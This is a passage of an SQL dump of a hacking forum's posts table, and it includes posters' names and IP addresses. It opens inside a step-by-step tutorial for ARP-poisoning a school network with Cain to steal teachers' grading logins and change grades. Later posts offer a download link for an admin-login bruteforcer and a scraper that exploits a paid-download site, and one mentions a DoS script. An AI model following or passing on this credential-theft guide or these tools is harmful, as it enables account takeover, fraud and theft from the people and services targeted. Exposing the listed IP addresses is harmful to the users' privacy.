poising. Click this button: [img]http://i.imgur.com/Q13Qx.png[/img] Great! Now you need to select some computers to poison. Click the \"+\" button to add some computers to your list [img]http://i.imgur.com/bdEhr.png[/img] The following box will pop up: [img]http://i.imgur.com/23YEe.png[/img] The default settings are perfectly fine, so scan everyone on your current subnet (which means everyone who\'s behind the same router/switch as you) Wait for it to finish scanning, once it\'s done move on to the next step. [size=medium][color=#FFA500]Step Four - Poising some ARP Caches![/color][/size] You are now going to direct everyone\'s traffic through your own computer so you can see what they are doing and steal their online passwords! Click the following tab: (Bottom left) [img]http://i.imgur.com/CbWMG.png[/img] Now click the Click the \"+\" button to add some computers to your list of \"to poison\" [img]http://i.imgur.com/bdEhr.png[/img] This window should now pop up: [img]http://i.imgur.com/yfkRh.png[/img] Now you\'re going to want to select the first IP address on the left, this is the router address so you can capture all data being sent to the router. Then select EVERYTHING in the right column. (Read the warning in the image above about selecting to many vlctims to poison!) Then click \"OK\" You are now intercepting all data on the network! Pat yourself on the back! You\'re screen should look like this: [img]http://i.imgur.com/uugrF.png[/img] [size=medium][color=#FFA500]Step Five - Viewing intercepted data[/color][/size] Great now that you\'re intercepting traffic you\'re going to want to view all the passwords you\'re stealing! Click this tab: (Again, bottom left) http://i.imgur.com/oNNtQ.png Now you see the following?: http://i.imgur.com/ASkST.png Those are all of the different types of passwords you\'re currently capturing! Since you\'re trying to get the online school grading passwords, click the \"HTTP\" section. Now you can see all the passwords you\'re capturing in realtime! [img]http://i.imgur.com/8PDhc.png[/img] Wow that\'s cool! Now just wait until a teach logs onto the online grading system and you\'ve then captured their password! [size=medium][color=#FFA500]Important - Read this[/color][/size] Something important to remember is that Cain is currently only capturing password data that it recognizes. It may not understand what data is a password and what isn\'t. You can specify what you want Cain to capture by clicking the \"Configure\" button at the top: See this link for image:[url=http://adf.ly/4tgwE] {{CLICK HERE TO SEE}}[/url] (max number of images in thread is 15) You should see the menu below, go to the \"HTTP Fields\" tab and select everything in the top column and \"Removal all\" do this for the bottom section too. [img]http://i.imgur.com/P3gSm.png[/img] Now you need to know the field names for the username and password of the school grading system. Go to the grading login page (if you don\'t know the URL just grab it from the data above). Now you want to view the source of the page (Ctrl + U in Firefox) Look for something like this: [code]Code: <input name=\"txtTeacherUsername\" id=\"txtTeacherUsername\" size=\"18\" value=\"\" class=\"gaia le val\" type=\"text\"> <input type=\"hidden\" name=\"txtTeacherPassword\" id=\"txtTeacherPassword\" size=\"18\" value=\"\" class=\"gaia le val\" type=\"text\">[/code] As you can see the two fields are \"txtTeacherUsername\" and \"txtTeacherPassword\" So now go back to Cain and add those field names in by inputting the field names and clicking the plus button: [img]http://i.imgur.com/XaSE9.png[/img] And click \"OK\" A nice little warning is that anyone who is connecting to a website via SSL will see this (most will just click to continue): [img]http://i.imgur.com/A6iri.png[/img] [size=large][b][color=#FF0000]Congrads! You are now capturing only the school grading system logins (unless multiple websites share the same field name!) Then remember the logins, go home (hide behind a proxy!) and login on the website and change your grades! THIS IF FOR EDUCATIONAL PURPOSES AND THIS TUTORIAL IS WRITTEN BY remasoni [/color][/b][/size]', '72.229.164.105', '1223009385', '1', '0', '5', '1346643469', '1', '96efe1f36ef038701e4b221f354cd4a5', '0', '1346643469'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1459', '311', '0', '15', 'UploadNSell Scraper', '0', '5', 'Timmy', '1346643720', '[size=medium][font=Courier][align=center][color=#FFA500]Hey, I just found one of the first pieces of code I\'ve ever written dug deep within my harddrive, and I assumed that some of you may like it.[/color] [color=#DCDCDC]Note: This was written in Visual Basic before I learned any other language, so the code is pretty... shitty.[/color] [color=#FF6347]It scrapes download links from http://uploadnsell.com, so you get free books, programs, and other stuff. I\'ve gotten some cool ebooks and some other shit like serial keys for games from it[/color] [color=#00BFFF][spoiler=Screenshots (Kinda simple)][img]http://jumla.in/i/tbs.png[/img][/spoiler][/color] [color=#FF69B4][spoiler=Virus Scan][img]http://jumla.in/i/zuv.png[/img] [url=https://www.virustotal.com/file/8ff1957871c5e51d025eaceb44a49db52f8baa41c7096ff3a300da0b090a500b/analysis/]Virus Scan[/url] [/spoiler][/color] [color=#00BFFF][spoiler=How to use]Due to the exploit I\'m using, you can only scrape the most recently purchased application. This means that you never know what your going to get. If you just leave this online overnight, you can acquire a nice list of download links. The \"Manual Scrape\" button is mostly there for debugging, the program will automatically check every 30 seconds by itself. Download links expire in 24 hours after they are scraped. Just FYI.[/spoiler][/color] [color=#32CD32][spoiler=Download] [lock][url=http://jumla.in/files/UploadNSellScraperNOSPAM.exe]Download (Active spam filter)[/url] [size=x-small][url=http://jumla.in/files/UploadNSellScraper.exe]Download (No spam filter)[/url][/size][/lock] [/spoiler] Again, I made this awhile ago. There are probably bugs, feel free to PM me about them, but, I may not bother fixing them.[/color][/align][/font][/size] Developer: Jumla', '72.229.164.105', '1223009385', '1', '0', '1', '1352011453', '1', '0073e9214a8d25b557564d126b17de00', '0', '1352011453'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1460', '308', '1453', '3', 'RE: Marketplace Removed', '0', '5', 'Timmy', '1346643789', 'Sucks but you had a legit reason.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '9a0e75a0b78086764e30841564234a69', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1461', '238', '1021', '56', 'RE: Ban the user above you', '0', '5', 'Timmy', '1346643920', 'Banned for having a blue username.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '22e92a2d5251f13bbc8239f3e9d3e856', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1462', '253', '1106', '56', 'RE: Count to 200', '0', '5', 'Timmy', '1346644063', '19. We\'re close to 20. BTW congratz apathy', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '89e952af2072a445fde1cf555ea8f044', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1463', '284', '1338', '7', 'RE: Typing Speed Test', '0', '5', 'Timmy', '1346644149', 'Mine [img]http://10fastfingers.com/speedtests/generate_screenshot_result/52_278_0_0_50_5_70.24_13191_44324[/img]', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '9bef1fa76f1d282a2ef645b3cd0e9d01', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1464', '156', '449', '13', 'RE: [tut]View/Download SQL DB', '0', '8', 'spacefish36', '1346644265', 'Nice tutorial, Thanks for the dork.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', 'd2eba8e6426545b499c0da63f6aedce1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1465', '310', '1458', '13', 'RE: [ HOT ] How to Hack Your School Grading System [Change]', '0', '8', 'spacefish36', '1346644318', 'Haven\'t tried it but it\'s a popular tutorial and yet unsaturated. Thanks', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', 'a50e9c28190ae185a74dba84f8961f8f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1466', '238', '1461', '56', 'RE: Ban the user above you', '0', '55', 'Baws', '1346644326', '[quote=\'Timmy\' pid=\'1461\' dateline=\'1346643920\'] Banned for having a blue username. [/quote] Banned for joining in June.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '1b492f4b2eb218211d4b2b85820bc5c1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1467', '312', '0', '15', 'RKTs Admin Login Bruteforcer v1.0', '0', '8', 'spacefish36', '1346644365', '[align=center][color=#FFD700][size=medium]Some screenshots:[/size][/color] [spoiler] Message on startup. [img]http://www.dodaj.rs/f/3T/vJ/1DSiyaHq/message.png[/img] Program in action. [img]http://www.dodaj.rs/f/1p/v7/3Ibfxoil/program.png[/img] [/spoiler] [color=#FF0000]Tool is coded by me in VB.Net and it requires Net Framework 4.0 installed on PC.[/color] [size=medium][color=#FFD700]How it works:[/color][/size] It works by combinating passwords from passwords list with admin username.Once when password is right,u will be in admin panel! [size=medium][color=#FFD700]How to:[/color][/size] Write admin login page URL,load passwords list,and write admin username. Next thing to do is to find username,password and login button name. To do that go on your admin login page and open source code,then find names. [spoiler][img]http://www.dodaj.rs/f/3Y/5U/1nVirbAb/names.png[/img][/spoiler] [lock][color=#FFD700][size=medium]Download (with 85 passwords list):[/size][/color] [spoiler] [code]http://www.sendspace.com/file/pvgonl[/code] or [code]http://mir.cr/7ZG8P4NL[/code] [/spoiler] [/lock] [size=medium][color=#FFD700]Note:[/color][/size] If you do something wrong,error will show.Just ingore it,if it keeps showing press stop button. v2.0 will be automated and much better![/align]', '72.229.164.105', '1223009385', '0', '0', '1', '1352012143', '1', '404978d9aa44beca3c902961d1b715e7', '0', '1352012143'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1468', '238', '1461', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1346644371', '[quote=\'Timmy\' pid=\'1461\' dateline=\'1346643920\'] Banned for having a blue username. [/quote] Banned for posting above me.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '95aac74d406fa455eb4ae189c8cd2fbf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1469', '214', '1006', '52', 'RE: [tut] Creating a IPod PID Generator', '0', '8', 'spacefish36', '1346644488', '[quote=\'iTzIpod\' pid=\'1006\' dateline=\'1345951240\'] Agreed with Timmy. Lmfao. Did someone say \"Ipod\"?!?!??!? :D Have no fear, iTzIpod is here. =] OT: I don\'t get this? Wait.. I don\'t know how to code. [/quote] It\'s a PID generator, people use the code in the OP to make a program. With the program you make special codes such as serials & PIDs for iPod then you use it to SE an Ipod', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '54358b38afd4244913ad4cf0a626d2ff', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1470', '215', '857', '52', 'RE: Adf.ly BOT source code', '0', '8', 'spacefish36', '1346644540', 'Thanks, I recently made a bot with this. Seems to be working good.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', 'bfbfc7cb3a0843d8b3c1d51c4238103b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1471', '259', '1147', '34', 'RE: Instant\'s GFX Guide', '0', '8', 'spacefish36', '1346644597', 'Nice tutorial but it seems like you messed up the code and you don\'t know how to fix this. Reported hopefully someone fixes the links.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', 'b00d7c57a1f1daee181e7c08ba4efc60', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1472', '313', '0', '52', '[VB.net Source] PayPal Cash System', '0', '1', 't3h jok3r', '1346644969', 'I\'ve been working on this PayPal Cash System, but i didn\'t have the time to finish it so I\'d thought that i would share it here so somebody else could finish it. Or just use the code to learn from. Here\'s a demonstration: [video=youtube]http://www.youtube.com/watch?v=jzwt00dXhVM&feature=youtu.be[/video] You can download the project here: https://dl.dropbox.com/u/48593307/PayPal%20Cash%20System.rar This was made by me, so please give credits if u decide to share it or something. Enjoy Thanks to idb for the utility class Credits: Anders', '72.229.164.105', '1223009385', '1', '0', '1', '1346644992', '1', 'd6c55ab911593c00274869d94c2a24b1', '0', '1346644992'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1473', '259', '1147', '34', 'RE: Instant\'s GFX Guide', '0', '1', 't3h jok3r', '1346645083', 'I actually can\'t go through this thread and fix each link because I have more stuff to do. BTW the solution is change URL to url. It shouldn\'t be uppercase.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'dbb69c6ce9bab187268775e208dbcd15', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1474', '314', '0', '2', 'Testing Staff Message MyCode', '0', '1', 't3h jok3r', '1346645469', '[mod]Tried infecting members[/mod]', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '908bbeb5afd775abfb25d5629088874b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1475', '259', '1147', '34', 'RE: Instant\'s GFX Guide', '0', '82', 'iTzIpod', '1346645677', 'Alright. I\'ll fix this tomorrow or so. If I got time.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b714b8ef79d13413dc55c58473a82a2a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1476', '315', '0', '61', 'Welcome to Unique\'s HQ', '0', '82', 'iTzIpod', '1346646375', 'Welcome everyone, This is Unique\'s private HQ. This is our introduction thread.', '24.212.197.164', '416597412', '1', '0', '82', '1346691754', '1', '572069b584c8ce154cbc9a11ad64e050', '0', '1346691754'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1489', '317', '0', '61', 'Unique\'s Purpose', '0', '82', 'iTzIpod', '1346692068', 'Leaders: Leader - iTzIpod Leader - NXK Purpose Unique is a group of knowledgeable & high-quality members. A group that is unique and \"special\" in many ways. We only invite members who meet the requirements and are Unique. Thank you for reading, Unique\'s Leaders - iTzIpod - NXK', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8182ef902d887ab931fc0a7eff8d248c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1477', '307', '1445', '3', 'RE: [Announcement] T3h Jok3r is back!!!', '0', '84', 'Thunder™', '1346646589', 'Not a big announcement :@', '111.91.75.221', '1868254173', '0', '0', '0', '0', '1', 'c1420ed32c720a9d714817058ad94855', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1490', '316', '1480', '4', 'RE: Hello everyone.', '0', '82', 'iTzIpod', '1346692291', 'Hello Remorsal. Welcome to LH. Enjoy your stay.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b730a28d3e4672ae6806351cf93d0a5b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1491', '266', '1488', '47', 'RE: Win a Free Netflix Account~', '0', '82', 'iTzIpod', '1346692600', '[quote=\'Jacob\' pid=\'1488\' dateline=\'1346691314\'] Can I participate ? :) Thanks :) [/quote] [quote=\'iTzIpod\' pid=\'1186\' dateline=\'1346111714\'] [b]Requirements: 25+ posts And 3 days registered.[/b] [/quote]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '10b4f60e6fb0dec822ca9066e58f8c0e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1479', '253', '1462', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1346647957', '[quote=\'Timmy\' pid=\'1462\' dateline=\'1346644063\'] 19. We\'re close to 20. BTW congratz apathy [/quote] 20. 180 more.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c67453e32cf20b9e80249b491b8b10d8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1480', '316', '0', '4', 'Hello everyone.', '0', '166', '2112', '1346648382', 'Hello everyone, I\'m [i]Remorsal[/i]. (2112 now) I partake in HF, and quite a bit of other things, I hope I get to know you guys well.', '108.220.98.220', '1826382556', '0', '0', '166', '1346718316', '1', '3b31924082d9246b9ef23d964151df8e', '0', '1346718316'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1481', '311', '1459', '15', 'RE: UploadNSell Scraper', '0', '2', 'Apathy', '1346651424', 'Does this use the check purchase then add it to after download method?', '173.206.177.61', '-1378963139', '0', '0', '0', '0', '1', '6199beaeb0bb97495c0c0874f4851837', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1482', '313', '1472', '52', 'RE: [VB.net Source] PayPal Cash System', '0', '2', 'Apathy', '1346651597', 'So what is this for?', '173.206.177.61', '-1378963139', '0', '0', '0', '0', '1', 'babcc3fd9b68028fd93f78038f49c232', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1483', '311', '1459', '15', 'RE: UploadNSell Scraper', '0', '67', 'HoverCatz', '1346656899', 'I already made one, and its not copy pasted from HF.', '193.161.89.201', '-1046390327', '1', '0', '0', '0', '1', '0c6b1ee5757954508e42e6951d5f71db', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1484', '302', '1405', '53', 'RE: Java DoS Script', '0', '67', 'HoverCatz', '1346658527', 'Why do you share code when you dont know what it does? The code i quoted will execute if you attack \"website.org\", and it will make your cpu go to 100%.', '193.161.89.203', '-1046390325', '1', '0', '0', '0', '1', 'bd18e057a695ce870e875b2a0a60e478', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1485', '307', '1445', '3', 'RE: [Announcement] T3h Jok3r is back!!!', '0', '160', 'Jacob', '1346673100', 'Welcome :) I was the one who PMed you :)', '142.255.31.241', '-1895882767', '0', '0', '0', '0', '1', '6139ffe8a19d7ee48154368e1a312e47', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1486', '307', '1448', '3', 'RE: [Announcement] T3h Jok3r is back!!!', '0', '61', 'NXK', '1346688837', 'Welcome back. Hope your trip was good.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '0593f33e54e1d79e432e5c7784664e45', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1487', '212', '1450', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1346691089', '[quote=\'t3h jok3r\' pid=\'1450\' dateline=\'1346642117\'] So far, only the Unique group was added. Other group ideas were overlooked. Mr. Omni\'s group suggestion was declined because their userbar wasn\'t attractive and I found out that they won\'t be active on LH because of their own website. [/quote] Oh alright. Thanks for making Unique Official! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9ebf45667226d540a5a1216c3de227ce', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1488', '266', '1186', '47', 'RE: Win a Free Netflix Account~', '0', '160', 'Jacob', '1346691314', 'Can I participate ? :) Thanks :)', '142.255.31.241', '-1895882767', '0', '0', '0', '0', '1', 'b05caf70a1382dcab3fa46b0ae0dd60a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1492', '281', '1335', '84', 'RE: Upload N Sell Exploit', '0', '53', 'sirchamp', '1346693876', 'WOW Nice thanks so much..', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '88e598d50a2c4f0fb021e978a940cab1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1493', '318', '0', '9', 'Want to Earn Money by doing Nothing ?', '0', '84', 'Thunder™', '1346695796', 'Want to Earn money Quick by Doing nothing ? U can Earn money by just Playing Heads and Tails. [IMG]http://i.imgur.com/ijaCG.jpg[/IMG] [IMG]http://i.imgur.com/ChOzw.jpg[/IMG] U will Get Paid instantly. [url=http://www.gugold.com/index.php?ref=U0713481]Click Here to Visit.[/url] :)', '111.91.75.56', '1868254008', '0', '0', '0', '0', '1', '488dc25b977bba43c6e985876cb24ce7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1494', '318', '1493', '9', 'RE: Want to Earn Money by doing Nothing ?', '0', '82', 'iTzIpod', '1346696391', 'I don\'t get it.. How do I register an account and start gambling me some money? O_o EDIT: Nevermind. So I made a Reserve Liberty account and now I want to start gambling some money.. But I don\'t have money on my account so I can\'r gamble. -_- What do I do?', '24.212.197.164', '416597412', '1', '0', '82', '1346698239', '1', '054f38f2eada2f39f1e664a9a58bb044', '0', '1346698239'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1495', '315', '1476', '61', 'RE: Welcome to Unique\'s HQ', '0', '61', 'NXK', '1346696967', 'When I came online and looked at the bottom where it shows online users, It displays your name as green.. same color as the free members. I got scared and thought you were demoted aha. This is awesome!', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'ba1a7df9e94a4032c578e5c15ae58a91', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1496', '317', '1489', '61', 'RE: Unique\'s Purpose', '0', '61', 'NXK', '1346697031', 'I hope everyone that joins us will put in as much dedication into these forums as we have!', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '0014cefe89582225875fa2fb8a9b14d3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1497', '319', '0', '3', '[Bug] Gray/Grey Stars are bugged', '0', '82', 'iTzIpod', '1346697522', 'Lol I don\'t know what to spell... Gray/Grey.. But the Gray/Grey Stars under my name are bugged. They no longer exist in LH\'s database.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8db1b86312719c72578b82529a5e10f7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1498', '315', '1495', '61', 'RE: Welcome to Unique\'s HQ', '0', '82', 'iTzIpod', '1346697620', '[quote=\'NXK\' pid=\'1495\' dateline=\'1346696967\'] When I came online and looked at the bottom where it shows online users, It displays your name as green.. same color as the free members. I got scared and thought you were demoted aha. This is awesome! [/quote] LOL :p I am/was equipping my Unique Userbar. It\'s Unique :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cddce5ebbe9345fd60206f61eafbb0e6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, 